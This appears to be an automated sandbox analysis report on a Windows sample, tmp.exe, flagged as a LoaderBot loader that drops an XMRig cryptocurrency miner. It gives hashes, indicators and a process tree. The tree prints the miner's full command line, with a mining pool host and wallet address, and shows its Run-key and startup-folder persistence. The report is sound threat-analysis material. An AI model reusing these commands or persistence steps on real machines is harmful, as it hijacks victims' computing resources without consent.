Analysis
-
max time kernel
53s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2023 04:54
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20230220-en
General
-
Target
tmp.exe
-
Size
2.1MB
-
MD5
79931719ae9c21e1d8c5f1a419e85f71
-
SHA1
d4c5bdc3d4a0f2e9ca5f6e9407b837dea75c8edd
-
SHA256
f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb
-
SHA512
e71ee3950f025f4aa0727a52b4493d9c57671bd73b3ae9309983229071c1812d2b9801067a0e80fa04dddc5e13e3dfdb223f07c75ab7757f296f79db7bad986f
-
SSDEEP
49152:ABRj0wlUtbZqxNwv6MitufUjzmTL7oG34n0FBhlT:at0wlUxgGqzULEGgi
Malware Config
Signatures
-
LoaderBot executable 4 IoCs
resource yara_rule behavioral2/files/0x000400000000073b-147.dat loaderbot behavioral2/files/0x000400000000073b-153.dat loaderbot behavioral2/files/0x000400000000073b-154.dat loaderbot behavioral2/memory/64-155-0x0000000000E80000-0x000000000127E000-memory.dmp loaderbot -
XMRig Miner payload 18 IoCs
resource yara_rule behavioral2/memory/4564-171-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4564-172-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5016-175-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5016-177-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5016-178-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5016-181-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5016-184-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5016-185-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5016-186-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-191-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-192-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-193-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-194-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-197-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-200-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-201-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-202-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3612-203-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation work.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation fesa.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url fesa.exe -
Executes dropped EXE 4 IoCs
pid Process 4328 work.exe 64 fesa.exe 4564 Driver.exe 5016 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\fesa.exe" fesa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1996 4564 WerFault.exe 93 2568 5016 WerFault.exe 100 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe 64 fesa.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 64 fesa.exe Token: SeLockMemoryPrivilege 4564 Driver.exe Token: SeLockMemoryPrivilege 4564 Driver.exe Token: SeLockMemoryPrivilege 5016 Driver.exe Token: SeLockMemoryPrivilege 5016 Driver.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 4804 wrote to memory of 4436 4804 tmp.exe 85 PID 4804 wrote to memory of 4436 4804 tmp.exe 85 PID 4804 wrote to memory of 4436 4804 tmp.exe 85 PID 4436 wrote to memory of 4328 4436 cmd.exe 88 PID 4436 wrote to memory of 4328 4436 cmd.exe 88 PID 4436 wrote to memory of 4328 4436 cmd.exe 88 PID 4328 wrote to memory of 64 4328 work.exe 89 PID 4328 wrote to memory of 64 4328 work.exe 89 PID 4328 wrote to memory of 64 4328 work.exe 89 PID 64 wrote to memory of 4564 64 fesa.exe 93 PID 64 wrote to memory of 4564 64 fesa.exe 93 PID 64 wrote to memory of 5016 64 fesa.exe 100 PID 64 wrote to memory of 5016 64 fesa.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exework.exe -priverdD3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 25⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4564 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4564 -s 7606⤵
- Program crash
PID:1996
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 25⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5016 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5016 -s 5366⤵
- Program crash
PID:2568
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 25⤵PID:3612
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 4564 -ip 45641⤵PID:2968
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 440 -p 5016 -ip 50161⤵PID:4720
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35B
MD5ff59d999beb970447667695ce3273f75
SHA1316fa09f467ba90ac34a054daf2e92e6e2854ff8
SHA256065d2b17ad499587dc9de7ee9ecda4938b45da1df388bc72e6627dff220f64d2
SHA512d5ac72cb065a3cd3cb118a69a2f356314eeed24dcb4880751e1a3683895e66cedc62607967e29f77a0c27adf1c9fe0efd86e804f693f0a63a5b51b0bf0056b5d
-
Filesize
1.9MB
MD5636373768d83d47a8469e19e7c364cba
SHA19a0af5c6a5af766c45d2d318727843f4909bf35f
SHA2560af038a51b667ec95cac7ebd4a4c04b5011c451e211c34cb1c918891e955268a
SHA5121f8d81b4463a0533d1e264cd946f5de8c7e5c584c9ac2ff63f23e3bd7c235abdc3f4a547059e71d362540bfbcedfb35bbcd558d83baa1daa675be059d34140f6
-
Filesize
1.9MB
MD5636373768d83d47a8469e19e7c364cba
SHA19a0af5c6a5af766c45d2d318727843f4909bf35f
SHA2560af038a51b667ec95cac7ebd4a4c04b5011c451e211c34cb1c918891e955268a
SHA5121f8d81b4463a0533d1e264cd946f5de8c7e5c584c9ac2ff63f23e3bd7c235abdc3f4a547059e71d362540bfbcedfb35bbcd558d83baa1daa675be059d34140f6
-
Filesize
4.0MB
MD533b4baef7b0a6ad57a7d30af324c4efd
SHA1b169a559615a8448d7ed7da56d36a6850d2092e2
SHA2563a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
SHA512739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
Filesize
4.0MB
MD533b4baef7b0a6ad57a7d30af324c4efd
SHA1b169a559615a8448d7ed7da56d36a6850d2092e2
SHA2563a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
SHA512739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
Filesize
4.0MB
MD533b4baef7b0a6ad57a7d30af324c4efd
SHA1b169a559615a8448d7ed7da56d36a6850d2092e2
SHA2563a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
SHA512739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322